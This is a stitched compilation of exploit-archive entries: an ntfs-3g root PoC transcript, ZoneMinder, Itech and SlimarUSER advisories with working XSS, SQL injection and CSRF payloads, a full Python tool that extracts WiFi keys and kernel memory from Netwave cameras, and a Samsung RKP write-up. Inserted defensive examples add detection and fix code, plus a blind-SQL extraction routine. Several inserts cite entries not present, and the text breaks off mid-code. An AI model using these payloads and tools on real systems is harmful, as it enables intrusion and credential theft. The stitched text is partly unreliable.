@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;:##';;;@;';+@@';;;@;;;;'@@':'@';@''+@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@# ' # @ + `@ # @` ,@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@, `@:'. .#` + @ ;#@` `,, ,`@ '` :@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@; `@@ @@ . @ ` @@ :@ :#@@ :@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#, @# @@ `## `.#@` :@ `@'@``` :@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@; @@ @@ : @`` ;@ :@' `@ #` :@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:` '@# @@ #` : `'@ :@@' # `@` :@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
$ whoami
user
$ ./cve-2017-0358.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ CVE-2017-0358, PoC by Kristian Erik Hermansen @
@ ntfs-3g local privilege escalation to root @
@ Credits to Google Project Zero @
@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @
@ Tested: Debian 9 (Stretch) @
@ Date: 2017-02-03 @
@ Link: https://goo.gl/A9I8Vq @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[*] Gathering environment info ...
[*] Creating kernel hijack directories ...
[*] Forging symlinks ...
[*] Pulling in deps ...
[*] Building kernel module ...
[+] SUCCESS: You have root. Don't be evil :)
# whoami
root
EOF
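The PoC above gets its module loaded by pointing modprobe at an attacker-controlled directory through MODPROBE_OPTIONS, which the setuid ntfs-3g binary passes through. Whatever the module is called, loading it leaves kernel-log evidence: it is out-of-tree and unsigned, so the kernel prints its taint messages before the module's own printk runs. The following is an added detection example, not part of the PoC or of ntfs-3g: it scans dmesg-style lines for those taint messages and reports modules that are not on a site allowlist. The sample lines are constructed to match the kernel's message formats and the PoC's printk text; the allowlist contents are an assumption.

```python
import re

# Added example, not part of the exploit above. Flags kernel taint messages
# produced when an out-of-tree or unsigned module is loaded, which is what a
# forged fuse.ko pulled in via "modprobe -d <attacker dir>" produces.

TAINT_RE = re.compile(
    r"^(?:\[\s*[\d.]+\]\s*)?"                       # optional dmesg timestamp
    r"(?P<mod>[A-Za-z0-9_]+): "
    r"(?P<why>loading out-of-tree module taints kernel"
    r"|module verification failed: signature and/or required key missing)"
)

# Assumed site allowlist of out-of-tree modules that are expected to taint.
ALLOWED_OUT_OF_TREE = {"nvidia", "vboxdrv"}

# Constructed sample log, following the kernel's message formats and the
# PoC's printk string.
SAMPLE_DMESG = """\
[  101.203344] fuse: init (API version 7.26)
[ 3021.118204] cve_2017_0358: loading out-of-tree module taints kernel.
[ 3021.118290] cve_2017_0358: module verification failed: signature and/or required key missing - tainting kernel
[ 3021.119011] [!] Exploited CVE-2017-0358 successfully; may want to patch your system!
[ 3022.000000] vboxdrv: loading out-of-tree module taints kernel.
"""


def suspicious_module_loads(lines):
    """Return sorted names of modules that tainted the kernel and are not allowlisted."""
    found = set()
    for line in lines:
        m = TAINT_RE.match(line.strip())
        if m and m.group("mod") not in ALLOWED_OUT_OF_TREE:
            found.add(m.group("mod"))
    return sorted(found)


def mentions_poc_marker(lines):
    """True if this PoC's own success message appears (an exact but brittle IOC)."""
    return any("Exploited CVE-2017-0358 successfully" in line for line in lines)


if __name__ == "__main__":
    lines = SAMPLE_DMESG.splitlines()
    for mod in suspicious_module_loads(lines):
        print("unexpected tainting module loaded: %s" % mod)
    if mentions_poc_marker(lines):
        print("CVE-2017-0358 PoC marker present")
```

The taint messages are generic, so this catches any unsigned module load, not just this PoC; the allowlist is what keeps it quiet on hosts that legitimately run out-of-tree drivers. On the prevention side, the setuid bit on ntfs-3g is what makes the MODPROBE_OPTIONS trick matter, so confirming the binary is either patched or no longer setuid root is the first check to run.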
Source: https://www.foxmole.com/advisories/foxmole-2016-07-05.txt
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=== FOXMOLE - Security Advisory 2016-07-05 ===
Zoneminder multiple vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected Versions
=================
Zoneminder 1.29,1.30
Issue Overview
==============
Vulnerability Type: SQL Injection, Cross Site Scripting, Session Fixation, No CSRF Protection
Technical Risk: high
Likelihood of Exploitation: medium
Vendor: Zoneminder
Vendor URL: https://zoneminder.com/
Credits: FOXMOLE employee Tim Herres
Advisory URL: https://www.foxmole.com/advisories/foxmole-2016-07-05.txt
Advisory Status: Public
CVE-Number: NA
CVE URL: NA
OVE-ID:
OVI-ID:
CWE-ID: CWE-89
CVSS 2.0: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
Impact
======
During an internal code review multiple vulnerabilities were identified.
The whole application misses input validation and output encoding.
This means user supplied input is inserted in an unsafe way.
This could allow a remote attacker to easily compromise user accounts or access the database in an unsafe way.
Issue Description
=================
The following findings are only examples; there are many more. The whole application should be reviewed.
All items tested using Firefox
1)Cross Site Scripting (XSS)
Reflected: http://192.168.241.131/zm/index.php?view=request&request=log&task=download&key=a9fef1f4&format=texty9fke%27%3Chtml%3E%3Chead%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C/body%3E%3C/html%3Eayn2h
Reflected without authentication: http://192.168.241.131/zm/index.php/LSE4%22%3E%3Cscript%3Ealert(1)%3C/script%3ELSE
Stored: Creating a new monitor using the name "Bla<script>alert(1)</script>". There is only a clientside protection.
2)SQL Injection
Example Url:http://192.168.241.131/zm/index.php
Parameter: limit (POST)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: view=request&request=log&task=query&limit=100;(SELECT *
FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434
Easy exploitable using sqlmap.
3)Session Fixation
After a successful authentication the Session Cookie ZMSESSID remains the same.
Example: Cookie before the login = ZMSESSID=26ga0i62e4e51mhfcb68nk3dg2 after successful login
ZMSESSID=26ga0i62e4e51mhfcb68nk3dg2
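Issue 3 above says the session identifier survives authentication. The following is an added example, not ZoneMinder code: it models a login that keeps whatever session id the client presented (the ZMSESSID behaviour observed) beside one that only accepts server-issued ids and rotates the id on success, and runs a fixation attempt against both. The credential store, the session store and the helper names are this example's assumptions.

```python
import secrets

# Added example, not ZoneMinder code. Models issue 3 (session id unchanged
# after login) and the fix (issue a fresh id at authentication).

USERS = {"admin": "s3cret"}         # constructed credentials


class SessionStore:
    def __init__(self):
        self.sessions = {}           # session id -> session data

    def new(self):
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"user": None}
        return sid

    def lookup(self, sid):
        return self.sessions.get(sid)


def login_vulnerable(store, sid, username, password):
    """Authenticate into whatever session id the client presented.

    Like a PHP app with session.use_strict_mode off and no
    session_regenerate_id(): an id the attacker planted in the victim's
    browser (via a link, a cookie set from a sibling host, or an XSS such
    as issue 1) becomes an authenticated admin session the attacker holds too.
    """
    sess = store.sessions.setdefault(sid, {"user": None})   # accepts unknown ids
    if USERS.get(username) == password:
        sess["user"] = username
    return sid                                              # cookie unchanged


def login_fixed(store, sid, username, password):
    """Only accept ids the server issued, and rotate the id on success."""
    sess = store.lookup(sid)
    if sess is None:
        sid = store.new()                 # unknown id: start a fresh session
        sess = store.sessions[sid]
    if USERS.get(username) != password:
        return sid
    store.sessions.pop(sid)               # the pre-login id stops working
    new_sid = store.new()
    store.sessions[new_sid].update(sess)  # carry over any pre-login state
    store.sessions[new_sid]["user"] = username
    return new_sid


def fixation_attack(login):
    """True if an attacker who planted a session id ends up logged in as admin."""
    store = SessionStore()
    planted = store.new()                 # attacker obtains an id from the site
    login(store, planted, "admin", "s3cret")   # victim logs in carrying that id
    attacker_view = store.lookup(planted)      # attacker presents the same id
    return bool(attacker_view and attacker_view["user"] == "admin")


def login_rotates_id(login):
    """True if a successful login changes the id and invalidates the old one."""
    store = SessionStore()
    before = store.new()
    after = login(store, before, "admin", "s3cret")
    return after != before and store.lookup(before) is None
```

In PHP the equivalent of login_fixed is calling session_regenerate_id(true) immediately after the credentials check, together with session.use_strict_mode so that ids the server never issued are not accepted at all.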
4)No CSRF Protection
A possible CSRF attack form, which changes the password of the admin (uid=1), if the corresponding user activates it.
<html>
<body>
<form action="http://192.168.241.131/zm/index.php" method="POST">
<input type="hidden" name="view" value="user" />
<input type="hidden" name="action" value="user" />
<input type="hidden" name="uid" value="1" />
<input type="hidden" name="newUser[MonitorIds]" value="" />
<input type="hidden" name="newUser[Username]" value="admin" />
<input type="hidden" name="newUser[Password]"
value="admin1" />
<input type="hidden" name="conf_password" value="admin1" />
<input type="hidden" name="newUser[Language]" value="" />
<input type="hidden" name="newUser[Enabled]" value="1" />
<input type="hidden" name="newUser[Stream]" value="View" />
<input type="hidden" name="newUser[Events]" value="Edit" />
<input type="hidden" name="newUser[Control]" value="Edit" />
<input type="hidden" name="newUser[Monitors]" value="Edit" />
<input type="hidden" name="newUser[Groups]" value="Edit" />
<input type="hidden" name="newUser[System]" value="Edit" />
<input type="hidden" name="newUser[MaxBandwidth]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
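Both the AlstraSoft subadminadd.php form earlier on this page and the ZoneMinder password-change form above succeed for the same reason: the handler acts on any POST that arrives with the admin's session cookie, and the browser attaches that cookie to a cross-site form submission automatically. The following is an added example, not AlstraSoft or ZoneMinder code: a minimal model of such a handler beside one that additionally requires a per-session synchronizer token, with the PoC replayed against both. The request and session shapes, the field name csrf_token and the helper names are this example's assumptions.

```python
import hmac
import secrets

# Added example, not vendor code. Shows why the CSRF PoCs on this page work
# and what a synchronizer-token check changes.


class Request:
    def __init__(self, form, cookies):
        self.form = form            # POST body fields
        self.cookies = cookies      # cookies the browser attached


def new_admin_session(sessions):
    """Log the admin in; return the session id that goes into the cookie."""
    sid = secrets.token_hex(16)
    sessions[sid] = {"user": "admin", "csrf": secrets.token_hex(16)}
    return sid


def csrf_token_for_form(sessions, sid):
    """Value the legitimate form page embeds in a hidden csrf_token field."""
    return sessions[sid]["csrf"]


def add_subadmin_vulnerable(req, sessions, subadmins):
    """Checks the session only: any site that can make the browser POST wins."""
    sess = sessions.get(req.cookies.get("sid"))
    if not sess or sess["user"] != "admin":
        return 403
    subadmins[req.form["user_login"]] = req.form["user_passwd"]
    return 200


def add_subadmin_fixed(req, sessions, subadmins):
    """Session check plus a token the attacker's page cannot read or guess."""
    sess = sessions.get(req.cookies.get("sid"))
    if not sess or sess["user"] != "admin":
        return 403
    supplied = req.form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, sess["csrf"]):   # constant-time compare
        return 403
    subadmins[req.form["user_login"]] = req.form["user_passwd"]
    return 200


def cross_site_attack(handler):
    """Replay the PoC form: the victim's browser sends the cookie, no token.

    Returns True if the attacker's account was created.
    """
    sessions, subadmins = {}, {}
    sid = new_admin_session(sessions)                     # admin is logged in
    evil = Request(form={"user_login": "attacker", "user_passwd": "pwned"},
                   cookies={"sid": sid})                  # cookie auto-attached
    handler(evil, sessions, subadmins)
    return "attacker" in subadmins


def legitimate_submit(handler):
    """Same request from the real admin page, which carries the token."""
    sessions, subadmins = {}, {}
    sid = new_admin_session(sessions)
    good = Request(form={"user_login": "helper", "user_passwd": "x",
                         "csrf_token": csrf_token_for_form(sessions, sid)},
                   cookies={"sid": sid})
    return handler(good, sessions, subadmins) == 200 and "helper" in subadmins
```

The token works because the same-origin policy stops the attacker's page from reading the admin's form, so it cannot copy the value into its own submission. Marking the session cookie SameSite=Lax (or Strict) is a useful second layer, since the browser then omits the cookie from the cross-site POST in the first place, but it is a browser-side control and should not replace the server-side check.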
Temporary Workaround and Fix
============================
FOXMOLE advises to disable Zoneminder until the vendor publishes a complete fix.
History
=======
2016-07-05 Issue discovered
2016-11-22 Vendor contacted, no response
2016-12-16 Vendor contacted again, still no response
2017-01-17 Vendor contacted --> working on a patch
2017-01-22 Vendor contacted, asked for an update and
declare advisory release to 2017-02-02 --> no response
2017-02-02 Advisory Release
GPG Signature
=============
This advisory is signed with the GPG key of the FOXMOLE advisories team.
The key can be downloaded here: https://www.foxmole.com/advisories-key-3812092199E3277C.asc
-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----
# Exploit Title : Itech Multi Vendor Script - Multiple SQL Injections
# Author : Yunus YILDIRIM (Th3GundY)
# Team : CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website : http://www.yunus.ninja
# Contact : yunusyildirim@protonmail.com
# Vendor Homepage : http://itechscripts.com/
# Software Link : http://itechscripts.com/multi-vendor-shopping-script/
# Vuln. Version : 6.49
# Demo : http://multi-vendor.itechscripts.com
# # # # DETAILS # # # #
SQL Injections :
# 1
http://localhost/quickview.php?id=10
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=10 AND 9776=9776
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=10 AND SLEEP(5)
# 2
http://localhost/product.php?id=9
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=9 AND 9693=9693
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=9 AND SLEEP(5)
# 3
http://localhost/product_search.php?search=Adidas
Parameter: search (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: search=Adidas%' AND SLEEP(5) AND '%'='
# 4
http://localhost/product_search.php?category_id=1
Parameter: category_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: category_id=1 AND 8225=8225
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: category_id=1 AND SLEEP(5)
# 5
http://localhost/product_search.php?category_id=1&sub_category_id=1&sub_sub_category_id=1
Parameter: sub_sub_category_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND 7485=7485
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND SLEEP(5)
# 6
http://localhost/product_search.php?category_id=1&sub_category_id=1
Parameter: sub_category_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: category_id=1&sub_category_id=1 AND 5242=5242
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: category_id=1&sub_category_id=1 AND SLEEP(5)
#!/usr/bin/python2.7
##
## spiritnull(at)sigaint.org
##
## Run the exploit against the victim to get WIFI password
## If the victim is vulnerable to memory leak it will try to extract the username and password for the weblogin
##
## magic for you bash:
## wget -qO- http://[HOST]:[PORT]//proc/kcore | strings
## wget -qO- http://[HOST]:[PORT]//etc/RT2870STA.dat
## wget -qO- http://[HOST]:[PORT]//dev/rom0
## wget -qO- http://[HOST]:[PORT]/get_status.cgi
##
## shodan dork:
## "Server: Netwave IP Camera"
##
## zoomeye dork:
## Netwave IP camera http config
##
## Requirements: Python 2.7, the third-party "tailer" module (pip install tailer),
## and the wget, tail, strings and killall binaries on PATH.
##
import sys,os,time,tailer
import urllib2
import subprocess
import signal
from threading import Thread

try:
    if sys.argv[1] == "-h" or sys.argv[1] == "--help":
        print "Usage: python pownetwave.py [HOST]:[PORT]"
        print "Example: python pownetwave.py 127.0.0.1:81"
        sys.exit(0)
    else:
        pass
except IndexError:
    print "Usage: python pownetwave.py [HOST]:[PORT]"
    print "Example: python pownetwave.py 127.0.0.1:81"
    sys.exit(0)

def signal_handler(signal, frame):
    # CTRL+C: remove the temporary dump files and stop the background wget/tail pipelines
    print('\nclearing up..')
    os.system("rm -rf tmpstream.txt")
    os.system("rm -rf tmpstrings.out")
    os.system("killall -9 wget")
    os.system("killall -9 tail")
    sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)

macaddr = ""
done = 0
linecount = 0

class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

# get_status.cgi returns JavaScript-style "var id='<mac>';" lines; the MAC is used
# later as a marker while walking the /proc/kcore dump
print "getting system information.."+sys.argv[1]
response = urllib2.urlopen('http://'+sys.argv[1]+'/get_status.cgi')
xcontent = response.read().split(";\n")
for line in xcontent:
    if line.startswith("var id="):
        line = line.split("'")
        macaddr = line[1]
    else:
        pass
print "victims MAC-ADDRESS: "+bcolors.OKGREEN+str(macaddr)+bcolors.ENDC

# the double slash lets the web server read arbitrary files from the camera's filesystem
print "getting wireless information.."
try:
    resp = urllib2.urlopen("http://"+sys.argv[1]+"//etc/RT2870STA.dat")
    xcontent = resp.read().split("\n")
    print "victims wireless information.."
    for line in xcontent:
        if line.startswith("WPAPSK") or line.startswith("SSID"):
            print "\t\t"+bcolors.OKGREEN+str(line)+bcolors.ENDC
        else:
            print "\t\t"+str(line)
except:
    print "wireless lan is disabled.."

print "checking for memory dump vulnerability.."
try:
    urllib2.urlopen('http://'+sys.argv[1]+'//proc/kcore')
except:
    print bcolors.FAIL+"victim isnt vulnerable for a memory leak, exiting.."+bcolors.ENDC
    sys.exit(0)

# stream the kernel memory image to disk and run strings over it as it grows
print "starting to read memory dump.. "+bcolors.WARNING+"this could take a few minutes"+bcolors.ENDC
proc = subprocess.Popen("wget -qO- http://"+sys.argv[1]+"//proc/kcore > tmpstream.txt", shell=True, preexec_fn=os.setsid)
os.system('echo "" >tmpstrings.out')
time.sleep(1)
proc2 = subprocess.Popen("tail -f tmpstream.txt | strings >>tmpstrings.out", shell=True, preexec_fn=os.setsid)
print bcolors.BOLD+"hit CTRL+C to exit.."+bcolors.ENDC

while 1:
    sys.stdout.flush()
    if os.stat('tmpstrings.out').st_size <= 1024:
        sys.stdout.write("binary data: "+str(os.stat('tmpstream.txt').st_size)+"\r")
    else:
        sys.stdout.flush()
        print "strings in binary data found.. password should be around line 10000"
        # once a line equal to the MAC address is seen, the next lines are printed as candidate credentials
        for line in tailer.follow(open('tmpstrings.out','r')):
            sys.stdout.flush()
            if done == 0:
                linecount+= 1
                if line == macaddr:
                    sys.stdout.flush()
                    done = 1
                    print bcolors.OKGREEN+"\n\nmac address triggered.. printing the following dumps, could leak username and passwords.."+bcolors.ENDC
                else:
                    sys.stdout.write(str(linecount)+"\r")
            elif done == 1:
                done = 2
                print "\nfirstline.. "+bcolors.OKGREEN+line+bcolors.ENDC
            elif done == 2:
                done = 3
                print "possible username: "+bcolors.OKGREEN+line+bcolors.ENDC
            elif done == 3:
                done = 4
                print "possible password: "+bcolors.OKGREEN+line+bcolors.ENDC
            elif done == 4:
                done = 0
                print "following line.. \n\n"+bcolors.OKGREEN+line+bcolors.ENDC
            else:
                pass
signal.pause()
Exploit Title: SlimarUSER Management v1.0 – 'id' Parameter SQL Injection
Date: 03.02.2017
Vendor Homepage: http://slimar.org
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
SlimarUSER is a PHP user management system full with features. The system allows website owners to manage their own users with complete login, registration and many other features. It can be used on its own, or integrated into any existing PHP powered website.
Sqlmap command: sqlmap.py -u "http://localhost/userman/inbox.php?p=view&id=7" --cookie="PHPSESSID=de3052c5dbb1d535d423ee1a2dbb076b; id=4; password=%242y%2410%24UuYt6q5GXU5UO37xc3j3GeN2ZM1hHB1sWqsAMs1DXAoeewSH.WYgq" --batch --random-agent --dbms=mysql
Vulnerable Url: http://localhost/userman/inbox.php?p=view&id=[payload]
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=view&id=7' AND 6275=6275 AND 'DFYF'='DFYF
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: p=view&id=7' AND SLEEP(5) AND 'HCUm'='HCUm
---
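The SlimarUSER and Itech payloads above (id=7' AND 6275=6275 AND 'DFYF'='DFYF and the SLEEP(5) variants) and the EPay login bypass earlier on this page (Username and Password both set to 'or''=') all come from the same defect: user input concatenated into a query string. The following is an added example, not vendor code: it rebuilds both bugs against an in-memory SQLite database, walks through the boolean-blind extraction loop that sqlmap automates against the inbox.php style of injection, and shows the parameterised form that closes the hole. The table layout and contents are constructed; SQLite's unicode() and substr() stand in for MySQL's ORD() and SUBSTRING(), and SQLite has no SLEEP(), so the time-based variant is not reproduced.

```python
import sqlite3

# Added example, not vendor code. Reproduces the boolean-blind injection and
# the ' or ''=' authentication bypass from this page against SQLite.

QUERIES = {"count": 0}      # number of requests the blind extraction needed


def make_db():
    """Constructed schema and data standing in for the vendor's tables."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 'Pa55w0rd')")
    con.execute("CREATE TABLE inbox (id INTEGER, owner TEXT, body TEXT)")
    con.execute("INSERT INTO inbox VALUES (7, 'bob', 'hello')")
    return con


def view_message_vulnerable(con, msg_id):
    """inbox.php?p=view&id=... as reported: the parameter is pasted into SQL."""
    QUERIES["count"] += 1
    sql = "SELECT body FROM inbox WHERE id='%s'" % msg_id
    return con.execute(sql).fetchone()


def view_message_fixed(con, msg_id):
    """Bound parameter: the value is data, never SQL."""
    return con.execute("SELECT body FROM inbox WHERE id=?", (msg_id,)).fetchone()


def login_vulnerable(con, username, password):
    """members/login.htm style check; 'or''=' in both fields yields
    ... WHERE username='' or ''='' AND password='' or ''='' which is always true."""
    sql = "SELECT id FROM users WHERE username='%s' AND password='%s'" % (username, password)
    return con.execute(sql).fetchone() is not None


def login_fixed(con, username, password):
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone() is not None


def oracle(con, condition):
    """Boolean-blind oracle: True iff the injected condition holds (row 7 returns)."""
    payload = "7' AND (%s) AND 'x'='x" % condition
    return view_message_vulnerable(con, payload) is not None


def blind_extract(con, column, table, where, maxlen=32):
    """Recover a column value one character at a time, 7 oracle calls per char.

    Only ASCII values are handled (binary search over 0..127); on MySQL use
    ORD(SUBSTRING(...)) in place of unicode(substr(...)).
    """
    scalar = "(SELECT %s FROM %s WHERE %s)" % (column, table, where)
    out = ""
    for pos in range(1, maxlen + 1):
        if not oracle(con, "length(%s) >= %d" % (scalar, pos)):
            break                                   # past the end of the value
        lo, hi = 0, 127
        while lo < hi:                              # invariant: char in [lo, hi]
            mid = (lo + hi) // 2
            if oracle(con, "unicode(substr(%s,%d,1)) > %d" % (scalar, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out
```

Run against the constructed database, blind_extract pulls the admin password out of the inbox viewer with a few dozen requests; the fixed functions return nothing for the same payloads because the driver never lets the value become part of the statement. Escaping (mysql_real_escape_string and friends) is a weaker substitute and does nothing for numeric contexts such as the Itech id=10 AND SLEEP(5) case, where no quote is involved at all.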
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=984
As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to prevent privilege escalation attacks by "shielding" certain data structures within the hypervisor.
During the initialization of RKP, a special command can be issued by EL1 kernel in order to mark the RKP read-only page as such in the stage 2 translation table. This command, "rkp_set_init_page_ro" (command code 0x51) has the following approximate high-level logic:
__int64 rkp_set_init_page_ro(struct args* args_buffer)
{
unsigned long page_pa = rkp_get_pa(args_buffer->arg0);
if ( page_pa < rkp_get_pa(text) || page_pa >= rkp_get_pa(etext) )
{
if ( !rkp_s2_page_change_permission(page_pa, 128LL, 0, 0) )// RO, XN
return rkp_debug_log("Cred: Unable to set permission for init cred", 0LL, 0LL, 0LL);
}
else
{
rkp_debug_log("Good init CRED is within RO range", 0LL, 0LL, 0LL);
}
rkp_debug_log("init cred page", 0LL, 0LL, 0LL);
return rkp_set_pgt_bitmap(page_pa, 0);
}
As we can see above, the function receives an address in the kernel VAS, and converts it to a physical address by adding a constant offset to it (the virt_to_phys offset for the kernel VAS). Then, the function proceeds to mark the resulting physical address as read-only and non-executable in the stage 2 translation table. Finally, the function proceeds to unset the bit in the RKP page-table bitmap corresponding to the given address. This is meant to indicate to EL1 that the address is protected by a stage 2 mapping.
However, the function fails to validate the bounds of the given virtual address (or the resulting physical address). This means that an attacker can supply any arbitrary address and the function will accept it as valid input. Similarly, the implementation of "rkp_set_pgt_bitmap" performs no such validations:
signed __int64 __fastcall rkp_set_pgt_bitmap(__int64 phys_addr, unsigned char set_or_unset)
{
unsigned long phys_off = phys_addr - 0x80000000LL;
unsigned long bitmap_index = (phys_off >> 18) & 0x3FFFFFFFFFFFLL;
if ( !rkp_pgt_bitmap )
return 0LL;
unsigned long bit_offset = (phys_off >> 12) & 0x3F;
if ( set_or_unset & 0x80 )
{
spin_lock(&rkp_bitmap_spinlock);
*(rkp_pgt_bitmap + 8 * bitmap_index) |= 1LL << bit_offset;
spin_unlock(&rkp_bitmap_spinlock);
result = 1LL;
}
else
{
spin_lock(&rkp_bitmap_spinlock);
*(rkp_pgt_bitmap + 8 * bitmap_index) &= ~(1LL << bit_offset);
spin_unlock(&rkp_bitmap_spinlock);
result = 1LL;
}
return result;
}
The RKP page-table bitmap is only 0x20000 bytes large (each bit denotes a 4KB page, resulting in a supported range of at-most 0x100000000 bytes). The base physical address for the bitmap is the physical base address for the kernel range - 0x80000000.
This means that if an attacker supplies any virtual address that is converted to a physical address not in the range of 0x80000000-0x180000000, the resulting "bitmap_index" will not be within the bitmap's bounds, causing the function to modify a bit out-of-bounds.
An attacker can use this in order to specifically craft an input virtual address so that the resulting calculated "bitmap_index" will have any arbitrary value, thus resulting in a modification at an arbitrary offset from the base of the page-table bitmap, within the context of RKP.
As the bitmap resides directly before RKP's code, an attacker can trivially use this primitive in order to modify the code or data pages belonging to RKP, thus gaining privilege escalation from EL1 to the context of RKP.
I've verified this issue on an SM-G935F device, build version "XXS1APG3". The RKP version present on the device is "RKP4.2_CL7572479".
Proof of concept for the RKP memory corruption in "rkp_set_init_page_ro".
This PoC modifies an instruction within RKP's address space by repeatedly calling "rkp_set_init_page_ro" with faulty input addresses.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41232.zip
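The out-of-bounds write comes down to the index arithmetic in rkp_set_pgt_bitmap and the missing range check in front of it. The Python 3 script below is an added example, not code from the Project Zero report or from RKP: it reproduces that arithmetic with the constants the write-up gives (bitmap base PA 0x80000000, one bit per 4KB page, a 0x20000-byte bitmap), shows which qword a given physical address lands on, inverts it so an attacker-chosen offset past the bitmap maps back to the address to pass in, and puts a bounds-checked variant beside it. KERNEL_VA_BASE is an assumed linear-map base used only to illustrate the constant-offset VA-to-PA conversion; it is not the device's real value.

```python
# Added example (not from the Project Zero report above): a Python 3 model of
# the index arithmetic in rkp_set_pgt_bitmap and of the bounds check it lacks.
# Constants come from the write-up (bitmap base PA 0x80000000, one bit per 4KB
# page, 0x20000-byte bitmap). KERNEL_VA_BASE is an assumed linear-map base used
# only to illustrate the constant-offset VA->PA conversion; it is not the
# device's real value.

BITMAP_BASE_PA = 0x80000000
BITMAP_BYTES = 0x20000
BITMAP_QWORDS = BITMAP_BYTES // 8                # 0x4000 64-bit entries
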